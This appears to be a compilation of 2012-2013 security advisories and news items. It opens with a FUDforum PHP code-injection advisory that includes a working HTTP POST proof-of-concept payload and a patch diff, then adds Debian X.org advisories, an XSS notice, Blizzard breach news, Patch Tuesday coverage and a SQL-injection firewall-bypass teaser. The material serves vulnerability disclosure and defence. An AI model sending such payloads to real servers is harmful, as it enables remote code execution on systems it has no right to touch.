Advisory ID: HTB23146 
Product: FUDforum 
Vendor: FUDforum 
Vulnerable Version(s): 3.0.4 and probably prior Tested Version: 3.0.4 
Vendor Notification: February 21, 2013 
 Vendor Patch: March 11, 2013 
 Public Disclosure: April 3, 2013 
Vulnerability Type: Code Injection [CWE-94] 
CVE Reference: CVE-2013-2267 
Risk Level: High CVSSv2 
Base Score: 7.1 (AV:N/AC:H/Au:S/C:C/I:C/A:C) 
Solution Status: Fixed by Vendor 
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )

Advisory Details: 
 High-Tech Bridge Security Research Lab discovered vulnerability in FUDforum, which can be exploited to execute arbitrary PHP code on the target system. 

 1) PHP Code Injection in FUDforum: CVE-2013-2267 The vulnerability exists due to insufficient validation of HTTP POST parameters "regex_str", "regex_str_opt" and "regex_with" in "/adm/admreplace.php" script before using them in the "preg_replace()" function. A remote administrator can send a specially crafted HTTP POST request, inject and execute arbitrary PHP code on the target system with privileges of the web server.

 The following PoC (Proof of Concept) code executes the "phpinfo()" function: 

 POST /adm/admreplace.php HTTP/1.1 
Host: fudforum Referer: http://fudforum/adm/admreplace.php?&SQ=8928823a5edf50cc642792c2fa4d8863 
Cookie: fud_session_1361275607=11703687e05757acb08bb3891f5b2f8d 
Connection: keep-alive 
Content-Type: application/x-www-form-urlencoded Content-Length: 111 SQ=8928823a5edf50cc642792c2fa4d8863&rpl_replace_opt=0&btn_submit=Add&btn_regex=1&edit=&regex_str=(.*)&regex_str_opt=e&regex_with=phpinfo() 

 Successful exploitation of the vulnerability requires administrative privileges within the application.

Solution: 

 Official Vendor patch is available here: http://fudforum.svn.sourceforge.net/fudforum/?rev=5596&view=rev 

 However, the above-mentioned patch does not entirely fix the vulnerability, which can still be exploited by other exploitation techniques (such as NULL-byte and others). 
 High-Tech Bridge Security Research Lab developed the following patch to eliminate the vulnerability: 

 --- admreplace.php.old Mon Mar 04 15:46:02 2013 +++ admreplace.php Tue Mar 26 02:51:59 2013 @@ -18,9 +18,7 @@ 


 if (!$_POST['rpl_replace_opt']) { - if ($_POST['rpl_preg_opt'] == 'e') { // Prevent code injection. - $_POST['rpl_preg_opt'] = 'i'; - } + if(false !== strpos($_POST['rpl_preg_opt'],'e')) { $_POST['rpl_preg_opt'] = 'i'; } $_POST['rpl_replace_str'] = '/'. $_POST['rpl_replace_str'] .'/'. $_POST['rpl_preg_opt']; $_POST['rpl_from_post'] = '/'. $_POST['rpl_from_post'] .'/'. $_POST['rpl_from_post_opt']; } else { @@ -184,7 +182,7 @@ if ($regex_str_opt == 'e') { $str = 'Code injection is not allowed!'; } else { - $str = preg_replace('/'. $regex_str .'/'. $regex_str_opt, $regex_with, $regex_src); + $str = preg_replace('/'. preg_quote($regex_str) .'/'. $regex_str_opt, $regex_with, $regex_src); Disclosure Timeline: 2013-02-21: Vendor notification. 2013-02-28: Secondary Vendor notification. 2013-03-03: Vendor patch. 2013-03-04: Vendor notification about patch bypasses. 2013-03-26: Vendor received our patch that eliminates the vulnerability. 2013-04-02: Still no modification of the official patch from the Vendor. 2013-04-03: Public Disclosure [<a href="https://www.htbridge.com/advisory/disclosure_policy.html";>Disclosure Policy</a>]. 


----------------------------------------------------------------------------------------------- 




 References: 


 [1] High-Tech Bridge Advisory HTB23146 - https://www.htbridge.com/advisory/HTB23146 - PHP Code Injection in FUDforum. [2] FUDforum - http://fudforum.org - FUDforum (Fast Uncompromising Discussion Forum) is a free and open source web discussion forum released under the GPL (version 2) license that is written in PHP and can be used on virtually any operating system. [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.

Package : libxxf86vm 
Vulnerability : several 
Problem type : remote 
Debian-specific: no 
CVE ID : CVE-2013-2001 

 Ilja van Sprundel of IOActive discovered several security issues in multiple components of the X.org graphics stack and the related libraries: Various integer overflows, sign handling errors in integer conversions, buffer overflows, memory corruption and missing input sanitising may lead to privilege escalation or denial of service. For the oldstable distribution (squeeze), this problem will be fixed soon as version 1:1.1.0-2+squeeze1. For the stable distribution (wheezy), this problem has been fixed in version 1:1.1.2-1+deb7u1. For the unstable distribution (sid), this problem has been fixed in version 1:1.1.2-1+deb7u1. 

 We recommend that you upgrade your libxxf86vm packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/

Package : libxvmc Vulnerability : several Problem type : remote Debian-specific: no CVE ID : CVE-2013-1990 CVE-2013-1999 

 A regression was discovered in the security update for libxvmc, causing segfaults with some applications. Updated packages are available to address this problem. For reference, the original advisory text follows. Ilja van Sprundel of IOActive discovered several security issues in multiple components of the X.org graphics stack and the related libraries: Various integer overflows, sign handling errors in integer conversions, buffer overflows, memory corruption and missing input sanitising may lead to privilege escalation or denial of service. For the oldstable distribution (squeeze), this problem has been fixed in version 2:1.0.5-1+squeeze2. For the stable distribution (wheezy), this problem has been fixed in version 2:1.0.7-1+deb7u2. 

 We recommend that you upgrade your libxvmc packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/

_
Vulnerabilities verified on Samsung Galaxy S2 for Sprint-US (Epic 4G Touch), with EL29 firmware (Android 2.3.6). Some, but likely not all, of these vulnerabilities are probably present on ICS and on other Samsung Galaxy series devices, but they have not been tested significantly there. Reader testing is welcome--I don't have other Samsung devices for testing myself, and have no desire to upgrade to ICS to test.

The open source version of Total Shop UK eCommerce based on CodeIgniter version 2.1.2 is subject to a cross-site scripting vulnerability. The value of a generic parameter was not sufficiently sanitised before being written to a block of Javascript code. An attacker could distribute a malicious URL that would trigger this vulnerability and potentially steal session cookies, redirect the user to a malicious URL or download malware onto their machine.

• CVE number: CVE-2012-4236
• Impact: High
• Vendor homepage: http://www.totalshopuk.com/
• Vendor notified: 06/08/2012
• Vendor fixed: 08/08/2012
• Credit: Chris Cooper and Joseph Sheridan of Reaction Information Security

Game maker Blizzard Entertainment's internal network security has been breached, the company informed customers today.

While the company behind World of Warcraft and Diablo believes no sensitive financial information was compromised, it said e-mailaddresses for non-China Battle.net players and scrambled passwords were stolen, Blizzard President Michael Morhaime said in a company blog post: 

 This week, our security team found an unauthorized and illegal access into our internal network here at Blizzard. We quickly took steps to close off this access and began working with law enforcement and security experts to investigate what happened. At this time, we've found no evidence that financial information such as credit cards, billing addresses, or real names were compromised. Our investigation is ongoing, but so far nothing suggests that these pieces of information have been accessed.

Microsoft today said it will patch at least 14 vulnerabilities next week, including four in Internet Explorer (IE), making it three monthsin a row that the company has plugged holes in its browser.

Of the nine updates set for Aug. 14, five will be labeled "critical," the most serious of the four ratings Microsoft uses. The other four will be pegged "important," the next-lower threat ranking.

The big story for next week will be the one-two punch of patches for Exchange and SQL Server.

"Those are two of the three things that are most important to IT in enterprises," said Andrew Storms, director of security operations atnCircle Security. "Thank goodness SharePoint's not included. But Microsoft is hitting two out of three in just one month."

This article is written for publicizing of new SQL injection method about detour some web firewall or some security solution. I did test on a web firewall made in Korean, most SQL injection attack was hit, I will not reveal the maker for cutting its damage.